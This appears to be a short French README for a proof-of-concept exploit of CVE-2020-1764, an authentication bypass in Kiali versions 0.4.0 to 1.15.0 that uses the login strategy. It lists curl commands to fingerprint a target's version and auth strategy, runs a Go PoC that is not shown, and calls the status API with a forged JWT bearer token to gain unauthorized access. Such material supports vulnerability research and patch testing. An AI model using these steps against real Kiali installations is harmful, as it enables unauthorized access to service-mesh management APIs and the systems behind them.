
Exploit de preuve de concept pour le contournement d'authentification CVE-2020-1764 dans Kiali 0.4.0–1.15.0, permettant un accès API non autorisé via des jetons JWT malveillants.
Preuve de concept (PoC) de contournement d'authentification pour Kiali 0.4.0 à 1.15.0 utilisant la stratégie d'authentification par connexion (Bulletin de sécurité)
Vérifier la version : curl 'http://<IP>/api
Vérifier la stratégie d'authentification : curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"